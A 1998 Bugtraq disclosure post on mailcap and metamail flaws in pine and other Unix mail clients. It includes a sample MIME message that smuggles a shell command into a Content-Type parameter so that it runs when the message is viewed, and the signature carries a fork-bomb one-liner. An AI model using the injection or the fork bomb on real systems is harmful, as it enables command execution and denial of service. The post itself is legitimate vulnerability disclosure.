Bugtraq mailing list archives
mailrc and pine security holes
From: lcamtuf () BOSS STASZIC WAW PL (Michal Zalewski)
Date: Sun, 5 Apr 1998 15:25:25 +0200
Many of mailcap-compatible unix mail clients have several security holes. Mailcap mechanism is usually so poorly implemented that it's possible to perform wida range of attacks - from 'harmless' messing on screen, through executing specific commands with arbitrary parameters, even to executing *arbitrary* commands via e-mail message. Here are examples, both tested under Linux RH 5.0 distribution (mailcap 1.0.6, pine 3.96): ======================================== Example 1 (light) - pine 3.96 confusion ======================================= Following example demostrates how to cause a few 'mostly harmless' errors due to the improper expansion of ` character by pine - it's just annoying, because you can't view this mail properly, but I have no idea if it's exploitable: **** SAMPLE MIME MESSAGE **** MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0007_01BD5F09.B6797740" ------=_NextPart_000_0007_01BD5F09.B6797740 Content-Type: text/plain; charset="crashme`" Content-Transfer-Encoding: quoted-printable Hellow! ------=_NextPart_000_0007_01BD5F09.B6797740-- **** END OF EXAMPLE *** =============================================== Example 2 (heavy) - execution of arbitrary code =============================================== That's something even more dangerous - following MIME mail, when viewed, executes 'touch /tmp/BIG_HOLE' (bug lies in metamail script): **** SAMPLE MIME MESSAGE **** MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0007_01BD5F09.B6797740" ------=_NextPart_000_0007_01BD5F09.B6797740 Content-Type: default; encoding="\\\"x\\\"\ ==\ \\\"x\\\"\ \)\ touch\ \/tmp/BIG_HOLE" Content-Transfer-Encoding: quoted-printable Hellow!!! ------=_NextPart_000_0007_01BD5F09.B6797740-- **** END OF EXAMPLE **** _______________________________________________________________________ Michal Zalewski [lcamtuf () boss staszic waw pl] <= finger for pub PGP key Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch] [echo "\$0&\$0">_;chmod +x _;./_] <=------=> [tel +48 (0) 22 813 25 86]
Current thread:
- Communicator exploits, (continued)
- Communicator exploits Fernand Portela (Apr 10)
- Sun rpcbind Nicolas Dubee (Apr 10)
- Re: Sun rpcbind Aaron Bornstein (Apr 10)
- QW vulnerability Glenn F. Maynard (Apr 07)
- AppleShare IP Mail Server Chris Wedgwood (Apr 07)
- Re: AppleShare IP Mail Server David Luyer (Apr 07)
- Re: AppleShare IP Mail Server James W. Abendschan (Apr 07)
- Geac ADVANCE library system security HOLE GAVRILIS DIMITR (Apr 02)
- Re: Geac ADVANCE library system security HOLE Damian Kelly (Apr 03)
- Announce : Nessus Alpha 1 Renaud Deraison (Apr 04)
- mailrc and pine security holes Michal Zalewski (Apr 05)
- ICQ Spoofer Seth McGann (Apr 05)
- Re: BSD coredumps follow symlinks Nir Soffer (Apr 02)
- Security hole in TMS/SMS standby (Apr 03)
- BSD coredumps follow symlinks Ronny Cook (Apr 02)
- Re: BSD coredumps follow symlinks Ronny Cook (Apr 05)
- QuakeI server serious hole (yawn) Chris Evans (Apr 06)
- The ICQ exploitation Center - www.wpi.edu/~smm/icq Seth McGann (Apr 06)
- Re: BSD coredumps follow symlinks Ariel Biener (Apr 06)